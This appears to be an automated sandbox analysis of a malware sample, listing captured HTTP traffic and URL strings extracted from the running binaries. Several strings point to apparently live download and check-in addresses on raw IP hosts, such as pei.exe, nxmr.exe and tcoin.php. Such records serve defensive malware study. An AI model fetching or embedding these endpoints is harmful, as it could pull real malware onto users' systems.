Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:35:56 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:36:00 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->

Source: 896429707.exe, 00000004.00000000.1387726862.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 896429707.exe, 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 896429707.exe, 00000004.00000003.1419564310.0000000000596000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000000.1419524273.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysnldcvmr.exe, 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysnldcvmr.exe, 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysnldcvmr.exe, 00000007.00000000.1542059561.0000000000410000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://185.215.113.66/
Source: sysnldcvmr.exe, 00000005.00000003.1503489308.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1504517011.00000000006EE000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1504556387.0000000000687000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1503974451.00000000006AA000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1503599612.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1503762545.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1504110490.00000000006E4000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000676000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1503639237.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1503849850.00000000006E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/1
Source: sysnldcvmr.exe, 00000005.00000003.1504556387.0000000000687000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/1A
Source: sysnldcvmr.exe, 00000005.00000003.1503489308.00000000006AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/1JJC:
Source: sysnldcvmr.exe, 00000005.00000003.1503489308.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1503639237.00000000006E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/1LMEM0X
Source: sysnldcvmr.exe, 00000005.00000003.1503489308.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1504517011.00000000006EE000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1503974451.00000000006AA000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1503599612.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1503762545.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1504110490.00000000006E4000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1503849850.00000000006E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/1oC
Source: sysnldcvmr.exe, 00000005.00000003.1503489308.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1503639237.00000000006E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/1r
Source: sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000676000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/1~
Source: sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000688000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/2
Source: sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000688000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/2H
Source: sysnldcvmr.exe, 00000005.00000002.3949590781.00000000006FB000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000002.3945918610.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/3
Source: sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000688000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/3$
Source: sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000688000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/3A
Source: sysnldcvmr.exe, 00000005.00000002.3949590781.00000000006FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/3C:
Source: sysnldcvmr.exe, 00000005.00000002.3949590781.00000000006FB000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000688000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000002.3945918610.00000000006C0000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000002.3945918610.00000000006AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/4
Source: sysnldcvmr.exe, 00000005.00000002.3949590781.00000000006FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/4C:
Source: sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000688000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/4T
Source: sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000688000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/5
Source: sysnldcvmr.exe, 00000005.00000002.3949590781.00000000006FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/5C:
Source: 896429707.exe, 00000004.00000000.1387726862.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 896429707.exe, 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 896429707.exe, 00000004.00000003.1419564310.0000000000596000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000000.1419524273.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysnldcvmr.exe, 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysnldcvmr.exe, 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysnldcvmr.exe, 00000007.00000000.1542059561.0000000000410000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://185.215.113.66/http://91.202.233.141/12345%s%s%s:Zone.Identifier%userprofile%%windir%%s
Source: f5TWdT5EAc.exe, 00000000.00000002.1369536312.0000000004CCE000.00000004.00000020.00020000.00000000.sdmp, f5TWdT5EAc.exe, 00000000.00000002.1366701322.000000000019A000.00000004.00000010.00020000.00000000.sdmp, f5TWdT5EAc.exe, 00000000.00000002.1369536312.0000000004C7E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/pei.exe
Source: f5TWdT5EAc.exe, 00000000.00000002.1369536312.0000000004C7E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/pei.exeA
Source: f5TWdT5EAc.exe, 00000000.00000002.1369536312.0000000004C7E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/pei.exeH
Source: f5TWdT5EAc.exe, 00000000.00000002.1369536312.0000000004C7E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/pei.exePPC:
Source: 640832494.exe	String found in binary or memory: http://185.215.113.66/tcoin.php?s=%s
Source: 78476062.exe, 0000000B.00000002.1777292756.0000000000E4E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.84/
Source: 78476062.exe, 0000000B.00000002.1777292756.0000000000E43000.00000004.00000020.00020000.00000000.sdmp, 78476062.exe, 0000000B.00000002.1777292756.0000000000E2D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.84/nxmr.exe
Source: 78476062.exe, 0000000B.00000002.1777292756.0000000000E43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.84/nxmr.exe($B
Source: 78476062.exe, 0000000B.00000002.1777292756.0000000000E30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.84/nxmr.exeP
Source: sysnldcvmr.exe, 00000005.00000003.1690649668.00000000009DD000.00000004.00000020.00020000.00000000.sdmp, 78476062.exe, 0000000B.00000002.1777160846.00000000007C2000.00000002.00000001.01000000.0000000C.sdmp, 78476062.exe, 0000000B.00000000.1623646967.00000000007C2000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://185.215.113.84/nxmr.exeP0
Source: 896429707.exe, 00000004.00000000.1387726862.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 896429707.exe, 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 896429707.exe, 00000004.00000003.1419564310.0000000000596000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000000.1419524273.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysnldcvmr.exe, 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysnldcvmr.exe, 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysnldcvmr.exe, 00000007.00000000.1542059561.0000000000410000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://91.202.233.141/
Source: sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000688000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000002.3945918610.00000000006AA000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000676000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.141/1
Source: sysnldcvmr.exe, 00000005.00000002.3945918610.000000000062E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.141/1aenh.dlly
Source: sysnldcvmr.exe, 00000005.00000002.3950944128.000000000233B000.00000004.00000010.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000688000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000002.3945918610.00000000006AA000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000002.3949590781.00000000006EF000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000676000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.141/2
Source: sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000676000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.141/2W
Source: sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000688000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.141/2k
Source: sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000688000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.141/2~
Source: sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000688000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.141/3
Source: sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000688000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.141/3S
Source: sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000688000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.141/4
Source: sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000676000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.141/5
Source: 1657630034.exe	String found in binary or memory: http://91.202.233.141/IBSTSWSONL
Source: svchost.exe, 00000011.00000003.2076118628.000001A6A4382000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2078169969.000001A6A4382000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/STS
Source: svchost.exe, 00000011.00000003.2076118628.000001A6A4377000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd
Source: svchost.exe, 00000011.00000003.2076118628.000001A6A4382000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2019401468.000001A6A432C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2078169969.000001A6A4382000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/tb
Source: svchost.exe, 00000011.00000003.2078169969.000001A6A437A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2076118628.000001A6A4377000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-
Source: svchost.exe, 00000011.00000003.2078169969.000001A6A437A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2076118628.000001A6A4377000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xs
Source: svchost.exe, 00000011.00000003.2019424299.000001A6A4374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1988183184.000001A6A437C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1858520247.000001A6A4307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1927200984.000001A6A4378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1926741816.000001A6A4376000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1858656380.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1780350418.000001A6A4352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2019245872.000001A6A436E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2078169969.000001A6A437A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2076118628.000001A6A4377000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: svchost.exe, 00000011.00000003.1987619608.000001A6A4307000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd$
Source: svchost.exe, 00000011.00000003.2049303254.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2018868593.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2019333713.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1987942495.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1858520247.000001A6A4307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1860337514.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1859498649.000001A6A430F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1988149862.000001A6A430F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1858853232.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1860508758.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2049566480.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1988209134.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1894564769.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1859091834.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1860862317.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1927130291.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1894755177.000001A6A4310000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2078380857.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1987619608.000001A6A4307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1988235899.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1858656380.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAA
Source: svchost.exe, 00000011.00000003.1893885080.000001A6A4329000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAAAA
Source: svchost.exe, 00000011.00000003.2019424299.000001A6A4374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1927200984.000001A6A4378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1926741816.000001A6A4376000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2019245872.000001A6A436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsds
Source: svchost.exe, 00000011.00000003.2019424299.000001A6A4374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1988183184.000001A6A437C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1858520247.000001A6A4307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1927200984.000001A6A4378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1988149862.000001A6A430F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1926741816.000001A6A4376000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1858656380.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2019245872.000001A6A436E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2078169969.000001A6A437A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2078019808.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2076118628.000001A6A4377000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: svchost.exe, 00000011.00000003.2049303254.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2018868593.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2019333713.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1987942495.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1858520247.000001A6A4307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1860337514.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1859498649.000001A6A430F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1988149862.000001A6A430F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1858853232.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1860508758.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2049566480.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1988209134.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1894564769.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1859091834.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1860862317.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1927130291.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1894755177.000001A6A4310000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2078380857.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1987619608.000001A6A4307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1988235899.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1858656380.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdA
Source: svchost.exe, 00000011.00000003.1893885080.000001A6A4329000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAA
Source: svchost.exe, 00000011.00000003.1893885080.000001A6A4329000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAA
Source: svchost.exe, 00000011.00000003.1780350418.000001A6A4352000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdmlns:
Source: svchost.exe, 00000011.00000003.2019424299.000001A6A4374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2019245872.000001A6A436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsds
Source: f5TWdT5EAc.exe, 00000000.00000002.1369536312.0000000004CE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: f5TWdT5EAc.exe, 00000000.00000000.1309216886.0000000000408000.00000002.00000001.01000000.00000003.sdmp, f5TWdT5EAc.exe, 00000000.00000002.1366762887.0000000000408000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: sysnldcvmr.exe, 00000007.00000000.1542059561.0000000000410000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
